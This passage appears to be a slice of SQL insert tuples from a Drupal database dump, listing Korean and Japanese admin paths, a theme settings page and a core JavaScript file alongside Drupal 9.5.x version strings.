(1674, 1431, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1675, 1432, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1676, 1433, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1677, 1434, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1678, 1435, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1679, 1436, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1680, 1437, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1681, 1438, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1682, 1439, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1683, 1440, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1684, 1441, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1685, 1442, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1686, 1443, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1687, 1444, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1688, 1445, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1689, 1446, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1690, 1447, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1691, 1448, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1692, 1449, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1693, 1450, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1694, 1451, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1695, 1452, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1696, 1453, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1697, 1454, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1698, 1455, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1699, 1456, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1700, 1457, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1701, 1458, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1702, 1459, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1703, 1460, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1704, 1461, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1705, 1462, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1706, 1463, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1707, 1464, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1708, 1465, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1709, 1466, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1710, 1467, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1711, 1468, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1712, 1469, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1713, 1470, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1714, 1471, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1715, 1472, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1716, 1473, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1717, 1474, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1718, 1475, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1719, 1476, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1720, 1477, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1721, 1478, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1722, 1479, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1723, 1480, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1724, 1481, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1725, 1482, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1726, 1483, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1727, 1484, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1728, 1485, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1729, 1486, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1730, 1487, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1731, 1488, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1732, 1489, 'path', '/ko/admin/structure/views/view/activity/preview/page_1?_wrapper_format=drupal_ajax', '9.5.9'),
(1733, 1490, 'path', '/ko/admin/structure/views/view/activity/preview/page_1?_wrapper_format=drupal_ajax', '9.5.9'),
(1734, 1491, 'path', '/ko/admin/structure/views/view/activity/edit/block_1', '9.5.9'),
(1735, 1492, 'path', '/ko/admin/structure/views/view/activity/edit/block_1', '9.5.9'),
(1736, 1493, 'path', '/ko/admin/structure/views/view/activity/edit/block_1', '9.5.9'),
(1737, 1494, 'path', '/ko/admin/structure/views/view/activity/edit/block_1', '9.5.9'),
(1738, 1495, 'path', '/ko/admin/structure/views/view/activity/edit/block_1', '9.5.9'),
(1739, 1496, 'path', '/ko/admin/structure/views/view/activity/edit/block_1', '9.5.9'),
(1740, 1497, 'path', '/ko/admin/structure/views/view/activity/edit/block_1', '9.5.9'),
(1741, 1498, 'path', '/ko/admin/structure/views/view/activity/edit/block_1', '9.5.9'),
(1742, 1499, 'path', '/ko/admin/structure/views/view/activity/edit/block_1', '9.5.9'),
(1743, 1500, 'path', '/ko/admin/structure/views/view/activity/edit/block_1', '9.5.9'),
(1744, 1501, 'path', '/ko/admin/structure/views/view/activity/preview/block_1?_wrapper_format=drupal_ajax', '9.5.9'),
(1745, 1502, 'path', '/ko/node/8/edit', '9.5.9'),
(1746, 1503, 'path', '/ja/activities/e-7-visa-niungngnkhaa-niungngnsaa-athuucmrnnybiijaap', '9.5.9'),
(1747, 1504, 'path', '/ko/admin/reports/updates', '9.5.9'),
(1748, 1505, 'path', '/ko/admin/reports/updates', '9.5.9'),
(1749, 1506, 'path', '/ko/admin/reports/updates', '9.5.9'),
(1750, 1507, 'path', '/ko/admin/reports/updates', '9.5.9'),
(1751, 1508, 'path', '/ko/admin/reports/updates', '9.5.9'),
(1752, 1509, 'path', '/ko/admin/reports/updates', '9.5.9'),
(1753, 1510, 'path', '/ko/admin/reports/updates', '9.5.9'),
(1754, 1511, 'path', '/ko/admin/reports/updates', '9.5.9'),
(1755, 1512, 'path', '/ko/admin/reports/updates', '9.5.9'),
(1756, 1513, 'path', '/ko/admin/reports/updates', '9.5.9'),
(1757, 1514, 'path', '/ko/admin/reports/updates', '9.5.9'),
(1758, 1515, 'path', '/ko/admin/reports/updates', '9.5.9'),
(1759, 1516, 'path', '/ko/admin/reports/updates', '9.5.9'),
(1760, 1517, 'path', '/ko/admin/structure/block/manage/companyprofiletitle?destination=/ko/admin/structure/block', '9.5.9'),
(1761, 1518, 'path', '/ko/admin/content', '9.5.9'),
(1762, 1519, 'path', '/ko/admin/content', '9.5.9'),
(1763, 1520, 'path', '/ko/admin/content', '9.5.9'),
(1764, 1521, 'path', '/ko/admin/content', '9.5.9'),
(1765, 1522, 'path', '/ko/admin/content', '9.5.9'),
(1766, 1523, 'path', '/ko/admin/content', '9.5.9'),
(1767, 1524, 'path', '/ko/node/26/delete', '9.5.9'),
(1768, 1525, 'path', '/ko/node/26/delete', '9.5.9'),
(1769, 1526, 'path', '/ko/node/26/delete', '9.5.9'),
(1770, 1527, 'path', '/ko/node/26/delete', '9.5.9'),
(1771, 1528, 'path', '/ja/node/preview/a91bb3f7-3280-4ede-b36d-74a0346f81b2/full', '9.5.10'),
(1772, 1529, 'path', '/ja/node/preview/a91bb3f7-3280-4ede-b36d-74a0346f81b2/full', '9.5.10'),
(1773, 1530, 'javascript', 'core/modules/node/node.preview.js', '9.5.11'),
(1774, 485, 'javascript', 'core/modules/node/node.preview.js', '9.5.11'),
(1775, 1531, 'javascript', 'core/modules/node/node.preview.js', '9.5.11'),
(1776, 1532, 'javascript', 'core/modules/node/node.preview.js', '9.5.11'),
(1777, 1533, 'javascript', 'core/modules/node/node.preview.js', '9.5.11'),
(1778, 1534, 'path', '/ko/node/23/edit', '9.5.10'),
(1779, 1535, 'path', '/ko/node/26/revisions', '9.5.10'),
(1780, 1536, 'path', '/ko/node/26/revisions', '9.5.10'),
(1781, 1537, 'path', '/ko/node/26/revisions', '9.5.10'),
(1782, 1538, 'path', '/ko/node/26/revisions', '9.5.10'),
(1783, 1539, 'path', '/ko/node/26/revisions', '9.5.10'),
(1784, 1540, 'path', '/ko/node/26/revisions', '9.5.10'),
(1785, 1541, 'path', '/ja/node/23/edit', '9.5.10'),
(1786, 1542, 'path', '/ja/content/company-profile', '9.5.10'),
(1787, 1543, 'path', '/ja/content/company-profile', '9.5.10'),
(1788, 1544, 'path', '/ko/block/add?destination=/ko/admin/structure/block/block-content', '9.5.10'),
(1789, 1545, 'path', '/ko/block/add?destination=/ko/admin/structure/block/block-content', '9.5.10'),
(1790, 1546, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1791, 1547, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1792, 1548, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1793, 1549, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1794, 1550, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1795, 1551, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1796, 1552, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1797, 1553, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1798, 1554, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1799, 1555, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1800, 1556, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1801, 1557, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1802, 1558, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1803, 1559, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1804, 1560, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1805, 1561, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1806, 1562, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1807, 1563, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1808, 1564, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1809, 1565, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1810, 1566, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1811, 1567, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1812, 1568, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1813, 1569, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1814, 1570, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1815, 1571, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1816, 1572, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1817, 1573, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1818, 1574, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1819, 1575, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1820, 1576, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1821, 1577, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1822, 1578, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1823, 1579, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1824, 1580, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1825, 1581, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1826, 1582, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1827, 1583, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1828, 1584, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1829, 1585, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1830, 1586, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1831, 1587, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1832, 1588, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1833, 1589, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1834, 1590, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1835, 1591, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1836, 1592, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1837, 1593, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1838, 1594, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1839, 1595, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1840, 1596, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1841, 1597, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1842, 1598, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1843, 1599, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1844, 1600, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1845, 1601, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1846, 1602, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1847, 1603, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1848, 1604, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1849, 1605, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1850, 1606, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1851, 1607, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1852, 1608, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1853, 1609, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1854, 1610, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1855, 1611, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1856, 1612, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1857, 1613, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1858, 1614, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1859, 1615, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1860, 1616, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1861, 1617, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1862, 1618, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1863, 1619, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1864, 1620, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1865, 1621, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1866, 1622, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1867, 1623, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1868, 1624, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1869, 1625, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1870, 1626, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1871, 1627, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1872, 1628, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1873, 1629, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1874, 1630, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1875, 1631, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1876, 1632, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1877, 1633, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1878, 1634, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1879, 1635, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1880, 1636, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1881, 1637, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1882, 1638, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1883, 1639, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1884, 1640, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1885, 1641, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1886, 1642, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1887, 1643, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1888, 1644, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1889, 1645, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1890, 1646, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1891, 1647, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1892, 1648, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1893, 1649, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1894, 1650, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1895, 1651, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1896, 1652, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1897, 1653, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1898, 1654, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1899, 1655, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1900, 1656, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1901, 1657, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1902, 1658, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1903, 1659, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1904, 1660, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1905, 1661, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1906, 1662, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1907, 1663, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1908, 1664, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1909, 1665, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1910, 1666, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1911, 1667, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1912, 1668, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1913, 1669, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1914, 1670, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1915, 1671, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1916, 1672, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1917, 1673, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1918, 1674, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1919, 1675, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1920, 1676, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1921, 1677, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1922, 1678, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1923, 1679, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1924, 1680, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1925, 1681, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1926, 1682, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1927, 1683, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1928, 1684, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1929, 1685, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1930, 1686, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1931, 1687, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1932, 1688, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1933, 1689, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1934, 1690, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1935, 1691, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1936, 1692, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1937, 1693, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1938, 1694, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1939, 1695, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1940, 1696, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1941, 1697, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1942, 1698, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1943, 1699, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1944, 1700, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1945, 1701, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1946, 1702, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1947, 1703, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1948, 1704, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1949, 1705, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1950, 1706, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1951, 1707, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1952, 1708, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1953, 1709, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1954, 1710, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1955, 1711, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1956, 1712, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1957, 1713, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1958, 1714, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1959, 1715, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1960, 1716, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1961, 1717, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1962, 1718, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1963, 1719, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1964, 1720, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1965, 1721, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1966, 1722, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1967, 1723, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1968, 1724, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1969, 1725, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1970, 1726, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1971, 1727, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1972, 1728, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1973, 1729, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1974, 1730, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1975, 1731, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1976, 1732, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1977, 1733, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1978, 1734, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1979, 1735, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1980, 1736, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1981, 1737, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1982, 1738, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1983, 1739, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1984, 1740, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1985, 1741, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1986, 1742, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1987, 1743, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1988, 1744, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1989, 1745, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1990, 1746, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1991, 1747, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1992, 1748, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1993, 1749, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1994, 1750, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1995, 1751, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1996, 1752, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1997, 1753, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1998, 1754, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(1999, 1755, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2000, 1756, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2001, 1757, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2002, 1758, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2003, 1759, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2004, 1760, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2005, 1761, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2006, 1762, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2007, 1763, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2008, 1764, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2009, 1765, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2010, 1766, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2011, 1767, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2012, 1768, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2013, 1769, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2014, 1770, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2015, 1771, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2016, 1772, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2017, 1773, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2018, 1774, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2019, 1775, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2020, 1776, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2021, 1777, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2022, 1778, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2023, 1779, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2024, 1780, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2025, 1781, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2026, 1782, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2027, 1783, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2028, 1784, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2029, 1785, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2030, 1786, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2031, 1787, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2032, 1788, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2033, 1789, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2034, 1790, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2035, 1791, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2036, 1792, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2037, 1793, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2038, 1794, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2039, 1795, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2040, 1796, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2041, 1797, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
(2042, 1798, 'path', '/ko/admin/appearance/settings/new_comet', '9.5.10'),
